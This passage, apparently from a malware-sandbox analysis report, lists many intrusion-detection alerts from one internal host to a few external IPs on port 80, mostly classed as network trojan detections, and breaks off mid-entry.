                                Timestamp:192.168.2.445.66.230.12350477802027700 01/05/23-09:00:34.531436
                                SID:2027700
                                Source Port:50477
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949940802027700 01/05/23-08:59:17.860681
                                SID:2027700
                                Source Port:49940
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950363802027700 01/05/23-09:00:20.166454
                                SID:2027700
                                Source Port:50363
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949762802027700 01/05/23-08:58:39.516895
                                SID:2027700
                                Source Port:49762
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950152802027700 01/05/23-08:59:55.124461
                                SID:2027700
                                Source Port:50152
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950448802027700 01/05/23-09:00:28.984022
                                SID:2027700
                                Source Port:50448
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949983802027700 01/05/23-08:59:29.068696
                                SID:2027700
                                Source Port:49983
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350434802027700 01/05/23-09:00:27.286420
                                SID:2027700
                                Source Port:50434
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350098802027700 01/05/23-08:59:49.765594
                                SID:2027700
                                Source Port:50098
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350256802027700 01/05/23-09:00:06.604757
                                SID:2027700
                                Source Port:50256
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949772802027700 01/05/23-08:58:45.558634
                                SID:2027700
                                Source Port:49772
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950307802027700 01/05/23-09:00:11.399055
                                SID:2027700
                                Source Port:50307
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950212802027700 01/05/23-09:00:02.305946
                                SID:2027700
                                Source Port:50212
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350181802027700 01/05/23-08:59:59.155389
                                SID:2027700
                                Source Port:50181
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950195802027700 01/05/23-09:00:00.463308
                                SID:2027700
                                Source Port:50195
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950373802027700 01/05/23-09:00:21.406793
                                SID:2027700
                                Source Port:50373
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349853802027700 01/05/23-08:59:05.252018
                                SID:2027700
                                Source Port:49853
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950129802027700 01/05/23-08:59:52.984377
                                SID:2027700
                                Source Port:50129
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950521802027700 01/05/23-09:00:38.171472
                                SID:2027700
                                Source Port:50521
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949950802027700 01/05/23-08:59:23.159452
                                SID:2027700
                                Source Port:49950
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950551802027700 01/05/23-09:00:40.708401
                                SID:2027700
                                Source Port:50551
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350796802027700 01/05/23-09:01:04.967692
                                SID:2027700
                                Source Port:50796
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350009802027700 01/05/23-08:59:33.049312
                                SID:2027700
                                Source Port:50009
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949795802027700 01/05/23-08:58:52.100118
                                SID:2027700
                                Source Port:49795
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950106802027700 01/05/23-08:59:50.631601
                                SID:2027700
                                Source Port:50106
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349866802027700 01/05/23-08:59:07.816063
                                SID:2027700
                                Source Port:49866
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349900802027700 01/05/23-08:59:12.531485
                                SID:2027700
                                Source Port:49900
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350194802027700 01/05/23-09:00:00.270444
                                SID:2027700
                                Source Port:50194
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950034802027700 01/05/23-08:59:41.402873
                                SID:2027700
                                Source Port:50034
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950024802027700 01/05/23-08:59:35.617721
                                SID:2027700
                                Source Port:50024
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.159.1850515802851115 01/05/23-09:00:38.190847
                                SID:2851115
                                Source Port:50515
                                Destination Port:80
                                Protocol:TCP
                                Classtype:Attempted Administrator Privilege Gain
                                Timestamp:192.168.2.445.66.230.12350191802027700 01/05/23-09:00:00.048057
                                SID:2027700
                                Source Port:50191
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350279802027700 01/05/23-09:00:08.746519
                                SID:2027700
                                Source Port:50279
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350767802027700 01/05/23-09:01:02.831756
                                SID:2027700
                                Source Port:50767
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350550802027700 01/05/23-09:00:40.652719
                                SID:2027700
                                Source Port:50550
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350019802027700 01/05/23-08:59:35.152748
                                SID:2027700
                                Source Port:50019
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949775802027700 01/05/23-08:58:46.727556
                                SID:2027700
                                Source Port:49775
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350800802027700 01/05/23-09:01:05.363036
                                SID:2027700
                                Source Port:50800
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950267802027700 01/05/23-09:00:07.554984
                                SID:2027700
                                Source Port:50267
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350668802027700 01/05/23-09:00:53.404259
                                SID:2027700
                                Source Port:50668
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949953802027700 01/05/23-08:59:23.590906
                                SID:2027700
                                Source Port:49953
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350408802027700 01/05/23-09:00:24.809813
                                SID:2027700
                                Source Port:50408
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950564802027700 01/05/23-09:00:41.851157
                                SID:2027700
                                Source Port:50564
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950126802027700 01/05/23-08:59:52.706718
                                SID:2027700
                                Source Port:50126
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350296802027700 01/05/23-09:00:10.277186
                                SID:2027700
                                Source Port:50296
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350072802027700 01/05/23-08:59:46.911726
                                SID:2027700
                                Source Port:50072
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350398802027700 01/05/23-09:00:23.940590
                                SID:2027700
                                Source Port:50398
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350444802027700 01/05/23-09:00:28.231736
                                SID:2027700
                                Source Port:50444
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949792802027700 01/05/23-08:58:51.792306
                                SID:2027700
                                Source Port:49792
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949917802027700 01/05/23-08:59:14.362847
                                SID:2027700
                                Source Port:49917
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950182802027700 01/05/23-08:59:59.116679
                                SID:2027700
                                Source Port:50182
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350276802027700 01/05/23-09:00:08.520289
                                SID:2027700
                                Source Port:50276
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350174802027700 01/05/23-08:59:58.408260
                                SID:2027700
                                Source Port:50174
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350263802027700 01/05/23-09:00:07.180447
                                SID:2027700
                                Source Port:50263
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350747802027700 01/05/23-09:01:00.773395
                                SID:2027700
                                Source Port:50747
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350000802027700 01/05/23-08:59:31.764454
                                SID:2027700
                                Source Port:50000
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350128802027700 01/05/23-08:59:52.910768
                                SID:2027700
                                Source Port:50128
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350217802027700 01/05/23-09:00:02.806984
                                SID:2027700
                                Source Port:50217
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950409802027700 01/05/23-09:00:24.809104
                                SID:2027700
                                Source Port:50409
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350306802027700 01/05/23-09:00:11.389535
                                SID:2027700
                                Source Port:50306
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349968802027700 01/05/23-08:59:26.374672
                                SID:2027700
                                Source Port:49968
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349978802027700 01/05/23-08:59:28.288952
                                SID:2027700
                                Source Port:49978
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.4222.236.49.12450001802851815 01/05/23-08:59:32.005402
                                SID:2851815
                                Source Port:50001
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350648802027700 01/05/23-09:00:52.314587
                                SID:2027700
                                Source Port:50648
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350737802027700 01/05/23-09:00:59.946119
                                SID:2027700
                                Source Port:50737
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350731802027700 01/05/23-09:00:59.516961
                                SID:2027700
                                Source Port:50731
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350559802027700 01/05/23-09:00:41.545121
                                SID:2027700
                                Source Port:50559
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350566802027700 01/05/23-09:00:42.193879
                                SID:2027700
                                Source Port:50566
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950350802027700 01/05/23-09:00:18.507774
                                SID:2027700
                                Source Port:50350
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950633802027700 01/05/23-09:00:48.158848
                                SID:2027700
                                Source Port:50633
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350375802027700 01/05/23-09:00:21.681622
                                SID:2027700
                                Source Port:50375
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950567802027700 01/05/23-09:00:42.161434
                                SID:2027700
                                Source Port:50567
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950389802027700 01/05/23-09:00:22.867048
                                SID:2027700
                                Source Port:50389
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349988802027700 01/05/23-08:59:29.862643
                                SID:2027700
                                Source Port:49988
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949802802027700 01/05/23-08:58:53.001309
                                SID:2027700
                                Source Port:49802
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349906802027700 01/05/23-08:59:13.066974
                                SID:2027700
                                Source Port:49906
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949782802027700 01/05/23-08:58:50.528332
                                SID:2027700
                                Source Port:49782
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349909802027700 01/05/23-08:59:13.298357
                                SID:2027700
                                Source Port:49909
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350197802027700 01/05/23-09:00:00.743514
                                SID:2027700
                                Source Port:50197
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350540802027700 01/05/23-09:00:39.761876
                                SID:2027700
                                Source Port:50540
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350102802027700 01/05/23-08:59:50.213457
                                SID:2027700
                                Source Port:50102
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350286802027700 01/05/23-09:00:09.400947
                                SID:2027700
                                Source Port:50286
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350632802027700 01/05/23-09:00:48.014171
                                SID:2027700
                                Source Port:50632
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350388802027700 01/05/23-09:00:22.934817
                                SID:2027700
                                Source Port:50388
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350013802027700 01/05/23-08:59:34.003382
                                SID:2027700
                                Source Port:50013
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350016802027700 01/05/23-08:59:34.645385
                                SID:2027700
                                Source Port:50016
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950376802027700 01/05/23-09:00:21.728685
                                SID:2027700
                                Source Port:50376
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950198802027700 01/05/23-09:00:00.797686
                                SID:2027700
                                Source Port:50198
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950080802027700 01/05/23-08:59:47.761595
                                SID:2027700
                                Source Port:50080
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350362802027700 01/05/23-09:00:19.974697
                                SID:2027700
                                Source Port:50362
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350556802027700 01/05/23-09:00:41.255796
                                SID:2027700
                                Source Port:50556
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350645802027700 01/05/23-09:00:50.308849
                                SID:2027700
                                Source Port:50645
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949976802027700 01/05/23-08:59:27.876514
                                SID:2027700
                                Source Port:49976
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350029802027700 01/05/23-08:59:40.224490
                                SID:2027700
                                Source Port:50029
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350451802027700 01/05/23-09:00:29.246458
                                SID:2027700
                                Source Port:50451
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350289802027700 01/05/23-09:00:09.612716
                                SID:2027700
                                Source Port:50289
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349873802027700 01/05/23-08:59:08.865896
                                SID:2027700
                                Source Port:49873
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350118802027700 01/05/23-08:59:51.834580
                                SID:2027700
                                Source Port:50118
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950014802027700 01/05/23-08:59:34.178140
                                SID:2027700
                                Source Port:50014
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950103802027700 01/05/23-08:59:50.320011
                                SID:2027700
                                Source Port:50103
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350705802027700 01/05/23-09:00:57.034412
                                SID:2027700
                                Source Port:50705
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950020802027700 01/05/23-08:59:34.976791
                                SID:2027700
                                Source Port:50020
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350218802027700 01/05/23-09:00:02.884885
                                SID:2027700
                                Source Port:50218
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349895802027700 01/05/23-08:59:11.730522
                                SID:2027700
                                Source Port:49895
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950176802027700 01/05/23-08:59:58.564874
                                SID:2027700
                                Source Port:50176
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350610802027700 01/05/23-09:00:45.966157
                                SID:2027700
                                Source Port:50610
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950406802027700 01/05/23-09:00:24.541555
                                SID:2027700
                                Source Port:50406
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949753802027700 01/05/23-08:58:37.519523
                                SID:2027700
                                Source Port:49753
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350162802027700 01/05/23-08:59:57.516191
                                SID:2027700
                                Source Port:50162
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350425802027700 01/05/23-09:00:26.391142
                                SID:2027700
                                Source Port:50425
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350621802027700 01/05/23-09:00:46.825545
                                SID:2027700
                                Source Port:50621
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950344802027700 01/05/23-09:00:17.742322
                                SID:2027700
                                Source Port:50344
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350229802027700 01/05/23-09:00:03.909654
                                SID:2027700
                                Source Port:50229
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950495802027700 01/05/23-09:00:35.569791
                                SID:2027700
                                Source Port:50495
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350167802027700 01/05/23-08:59:57.962831
                                SID:2027700
                                Source Port:50167
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350458802027700 01/05/23-09:00:30.170957
                                SID:2027700
                                Source Port:50458
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350330802027700 01/05/23-09:00:16.062133
                                SID:2027700
                                Source Port:50330
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950053802027700 01/05/23-08:59:43.898325
                                SID:2027700
                                Source Port:50053
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350453802027700 01/05/23-09:00:29.568259
                                SID:2027700
                                Source Port:50453
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950058802027700 01/05/23-08:59:44.753927
                                SID:2027700
                                Source Port:50058
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950467802027700 01/05/23-09:00:31.427874
                                SID:2027700
                                Source Port:50467
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350615802027700 01/05/23-09:00:46.436404
                                SID:2027700
                                Source Port:50615
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350811802027700 01/05/23-09:01:06.359671
                                SID:2027700
                                Source Port:50811
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350396802027700 01/05/23-09:00:23.706162
                                SID:2027700
                                Source Port:50396
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350044802027700 01/05/23-08:59:42.615594
                                SID:2027700
                                Source Port:50044
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949926802027700 01/05/23-08:59:15.791384
                                SID:2027700
                                Source Port:49926
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.4222.236.49.12449876802851815 01/05/23-08:59:09.139033
                                SID:2851815
                                Source Port:49876
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949966802027700 01/05/23-08:59:26.148209
                                SID:2027700
                                Source Port:49966
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350347802027700 01/05/23-09:00:18.136363
                                SID:2027700
                                Source Port:50347
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350308802027700 01/05/23-09:00:11.627355
                                SID:2027700
                                Source Port:50308
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950401802027700 01/05/23-09:00:24.007042
                                SID:2027700
                                Source Port:50401
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950221802027700 01/05/23-09:00:03.152132
                                SID:2027700
                                Source Port:50221
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349952802027700 01/05/23-08:59:23.562063
                                SID:2027700
                                Source Port:49952
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949758802027700 01/05/23-08:58:38.567804
                                SID:2027700
                                Source Port:49758
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350638802027700 01/05/23-09:00:48.603960
                                SID:2027700
                                Source Port:50638
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950299802027700 01/05/23-09:00:10.577537
                                SID:2027700
                                Source Port:50299
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950483802027700 01/05/23-09:00:34.965368
                                SID:2027700
                                Source Port:50483
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950647802027700 01/05/23-09:00:50.385312
                                SID:2027700
                                Source Port:50647
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350061802027700 01/05/23-08:59:45.236772
                                SID:2027700
                                Source Port:50061
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950808802027700 01/05/23-09:01:05.963756
                                SID:2027700
                                Source Port:50808
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950517802027700 01/05/23-09:00:37.849765
                                SID:2027700
                                Source Port:50517
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950192802027700 01/05/23-09:00:00.204185
                                SID:2027700
                                Source Port:50192
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949781802027700 01/05/23-08:58:49.356501
                                SID:2027700
                                Source Port:49781
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350023802027700 01/05/23-08:59:35.490985
                                SID:2027700
                                Source Port:50023
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950037802027700 01/05/23-08:59:41.840768
                                SID:2027700
                                Source Port:50037
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350101802027700 01/05/23-08:59:50.002346
                                SID:2027700
                                Source Port:50101
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949999802027700 01/05/23-08:59:31.762334
                                SID:2027700
                                Source Port:49999
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950032802027700 01/05/23-08:59:40.872811
                                SID:2027700
                                Source Port:50032
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950720802027700 01/05/23-09:00:58.253761
                                SID:2027700
                                Source Port:50720
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950115802027700 01/05/23-08:59:51.575252
                                SID:2027700
                                Source Port:50115
                                Destination Port:80
                                Protocol:TCP
